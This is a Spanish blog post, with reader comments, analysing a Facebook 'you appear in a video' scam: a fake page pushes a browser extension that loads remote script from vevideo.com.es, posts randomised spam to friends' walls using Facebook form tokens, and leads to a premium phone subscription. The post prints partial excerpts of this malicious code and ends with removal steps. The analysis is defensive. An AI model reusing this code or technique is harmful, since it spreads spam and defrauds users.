En un principio no iba a escribir nada sobre esto pero este post tiene que ver con la última entrada. Al final lo explico.
Hoy al meterme en facebook en mi perfil había lo siguiente, y parece ser que a más de una persona le ha pasado:
Hoy al meterme en facebook en mi perfil había lo siguiente, y parece ser que a más de una persona le ha pasado:
Pasos que he seguido para analizar un poco lo que pasa:
[También explico como des-instalar el comúnmente llamado "virus de Facebook" aunque no tenga nada que ver ni con un virus ni con Facebook.]
2) Dicho link me ha llevado a esta página:
Nos dicen que para poder ver el video clickemos en Continue
No clickeis, si lo habéis hecho y usáis Firefox os saldrá una alerta diciendo que se quiere instalar el plugin, pulsar en la x o en "esta vez no". Y si ya lo habéis instalado al final os explico como eliminarlo.
3) Si queréis ver que archivo se os instala he mirado el código fuente de la página web y hay un script con lo siguiente:
<script> var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1; var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1; function instalar(){ if (is_chrome){ window.open("http://vevideo.com.es/plugin/youtube.crx"); } else if(is_firefox){ var params = { "Youtube Extension": { URL: "http://vevideo.com.es/plugin/youtube.xpi", toString: function () { return this.URL; } } }; InstallTrigger.install(params); } else{ top.location.href="http://vevideo.com.es/plugin/unlocked.php"; } } </script>
Hay una función llamada instalar() que dependiendo si usas Chrome o si usas Firefox te descarga el archivo correspondiente para el navegador. (esta vez los de Internet Explorer están a salvo!)
Me he bajado ambas versiones, una para instalarlo en un navegador que tengo para hacer pruebas y la otra par ver el código interno y ver un poco que hace.
Yo me he bajado la extensión para firefox, tiene una extensión .xpi pero con un simple renombrar a .zip ya se puede descomprimir el fichero y ver todo lo que hay dentro. (Aquí el fichero por si le queréis echar un vistazo).
4) A la hora de instalarlo te sale esto:
Una vez instalado F5 y te sale esto otro:
Y tachán! aquí esta lo que mencionaba sólo empezar este post diciendo que tenía que ver con la anterior entrada:
Volvemos a estar ante la misma página que nos aseguraba que podríamos ver quien visita nuestro perfil de tuenti si ingresábamos nuestro número. Otra vez nombran (Actualizo para aclarar malinterpretaciones (16-12-11): en ningún momento digo que sean ellos los responsables de todo esto, no sería de extrañar que hayan contratado a una subempresa) a la empresa "X" y si leemos la letra pequeña otra vez nos puedo costar unos 35€/mes la broma... Y obviamente, seguiremos sin poder ver el vídeo que nos prometían.5) Respecto a la extensión/plugin o comúnmente llamado "virus o algo así del facebook" x) que se nos ha instalado en nuestro navegador, voy a mencionar varias cosas sobre el código.
En el archivo youtube.js de la extensión que nos hacen instalar se ve lo siguiente
En dicho código javascript se llama a este otro:
loadScript_you();
function loadScript_you() {
...
s.setAttribute("src", "http://vevideo.com.es/plugin/script.js");
...
}
http://vevideo.com.es/plugin/extra.js
var blogs = new Array();
blogs[0] = 'http://ferdie11.blogspot.com/';
blogs[1] = 'http://ferdie22.blogspot.com/';
blogs[2] = 'http://ferdie333.blogspot.com/';
blogs[3] = 'http://ferdie44.blogspot.com/';
...
randno2 = Math.floor ( Math.random() * blogs.length );
blog=blogs[randno2];
...
function enchulatuFB(){...
var post_form_id=document['getElementsByName']('post_form_id')[0]['value'];
var fb_dtsg=document['getElementsByName']('fb_dtsg')[0]['value'];
var video_url=blog;
var domains=['http://i43.tinypic.com/k1a1rd.png'];
var p0=['.'];
var p1=['hola','como va','como estas!','Que tal','Hola!','Mira!'];
var p2=['has visto que','ya vistes que','sabes que'];
var p3=[' sales en un video??'];
var message='';
var a;
gf=new XMLHttpRequest(); ...
Como se puede observar, crean tres vectores para crear frases aleatorias saludándote y preguntándote de distintas formas si has visto el vídeo. Estás serán las que luego escribirás a tus amigos sin tú consentimiento.
También se puede ver la dirección de la imagen que se agrega a dicho comentario (la foto borrosa de gente de fiesta).
Otra cosa que me ha parecido curiosa es el comienzo del código, crean otro array de blogs, supongo que lo deben hacer para que siempre hayan enlaces vivos por facebook para que los usuarios sigan clickando, así, aunque los usuarios de facebook denuncie como spam el vídeo que le han puesto en su muro, creo que sólo se marca como spam lo que venga de ese blog, por lo que si tienen diversos blogs como (http://roter5.blogspot.com/, http://aderf6.blogspot.com/ o http://deltw6.blogspot.com/) siempre les quedarán webs activas donde alojar su código "malicioso ".
En resumen, un amigo nos dice si hemos visto el video dónde tú sales, la gente clicka, se instala el plugin/extensión para "poder ver el video", dicho video no existe pero ahora tienes una extensión en tu navegador la cual hará que vayas escribiendo sin tu consentimiento a muros aleatorios de tus amigos si han visto un video dónde salen, y así sucesivamente.
¿Y para qué hacen esto? Facebook tiene más de 500 millones de usuarios registrados, es decir, hay más usuarios registrados en Facebook que habitantes viviendo en Europa. Por lo que tan sólo se instale una minoría el plugin, es muy fácil que se extienda, y con que una minoría haga todos los pasos e ingrese al final su número de teléfono para "poder ver el vídeo", ya se pueden imaginar la de cantidad de dinero que pueden hacer si cada mes pueden llegar a ganar 35€/persona. Respuesta: Lo hacen por dinero.
Si te has enterado ahora de esto y ya te has instalado dicho plugin/extensión tan sólo tienes que hacer esto:
- Si usas Chrome como navegador pulsa en Herramientas-Extensiones y te saldrá algo así:
Pulsas en Desisntalar y ya está.
- Si usas Firefox (Mozilla) tan sólo tendrás que pulsar en Herramientas-Complementos, ir a la pestaña de Plugins y donde ponga Extension YouTube pulsar en Desactivar y/o Eliminar
Conclusiones:
- No se fíen de todo lo que les aparece en vuestro muro.
- Eviten insertar el número de teléfono por Internet.
- Si los propios navegadores os advierten de que es peligroso instalar una extensión o un plugin, hagan caso a no ser que sepan que están haciendo exactamente.
26 comentarios:
gracias por la explicacion y por los consejos. es bueno saber que hay personas que pueden ayudarnos a aquellos que no sabemos. como dice el conocimiento es global y publico y debe ser compartido.
Excelente ayuda... muchas gracias.
Contacten a la gente de MasFB que tambien están investigando los scripts para detectar más sitios sobre este virus del video de facebook.
http://t.co/GqndLbNz
@Anónimo, muchas gracias a ambos. Ya he les he comentado algo a gente de MasFB, gracias por avisar. =)
Gracias Por la Información me sirvió de mucho! :D
gracias ... me sirvio porque el antivirus que tengo me molestaba siempre... diceendo... dirrección web bloqueada y me enseñaba esa dirección y esa dirección Ip... creia que era un virus.... en fin... me sirvio mucho gracias.
Muchas graciaaaas!!!!
ha sido muy útil! gracias!
@Anónimo, me alegro que te haya sido de ayuda, muchas gracias por comentar :)
Muchas gracia, me a servido bastante, les agradezco, un montón.
Hola, a mí me ha entrado este virus camuflado de actualización de Windows. Elimino las extensiones pero cada vez que enciendo el ordenador se pone en marcha el proceso de actualizaciones de Windows y se me vuelve a instalar. No sé qué hacer porque todo lo que he encontrado en Internet sobre este virus es de Facebook y no me ha entrado por Facebook. Necesito ayuda!
GRACIASS ME ESTABA VOLVIENDO LOCA!!!!
@siquieroporsandrallopis, si usaras un linux como sistema operativo no tendrías ese problema ;)
Aún así intento ayudarte:
No sé cuánto te manejas con tu windows pero una solución rápida que se me ocurre sin que me des más información a tu problema es la siguiente:
1."pulsa el icono de windows + r"
2. Teclea "msconfig" y pulsa intro.
3. En las pestañas WIN.INIT y SYSTEM.INIT te aparecerán todos los procesos que se inician al arrancar windows, ahí estará camuflado el nombre (o no) del proceso/"virus" que mencionas que se arranca cada vez que inicias el ordenador. Intenta identificar dicho proceso por el nombre y desmárcalo de la lista. A veces ponen nombres parecidos a los procesos del sistema para que sea difícil detectarlos.
Espero que te sea de ayuda, si no te aclaras o no lo consigues así lo mejor es que te instales un buen antivirus gratuito y que busque él la solución.
Saludos y gracias por comentar.
viejo a plano 31 de diciembre me has dado un buen consejo de ani nuevo. gracvias y lo mejor para vos amigo virtual!
Muchas gracias! estoy salvadooooooooooooooooo :D
Me salvaste con un post que hiciste ya hace mas de un año :)
Realmente a estas altura ya estaba arto de este problema, MUCHAS GRACIAS
muchas gracias
Millon de gracias.
Millones de gracias!! Tan simple como eso... pero a quién se le habria ocurrido.
Gracias!!
Muy bueno el post me ayudo mucho! es mas ahora tenia ese virus que no me dejaba entrara a cualquier pag. saludos!
Excelente tu blog. Me estaba volviendo loco. Muchisimas gracias.
Ferro: mil gracias, desde otro sitio del planeta recibo con agrado esta ayuda, ya no sabia cómo manejar este asunto.
Desde otro sitio del planeta, mil gracias por esta ayuda pues no tenia ni idea a quien pedir ayuda
S
gracias ya me estaba volviendo loca muchísimas gracias !!!!
PERFECTOOO! GRACIAS, practico y sencillo, me ayudó mucho todo, gracias totales. :)
Gracias, banda.
Publicar un comentario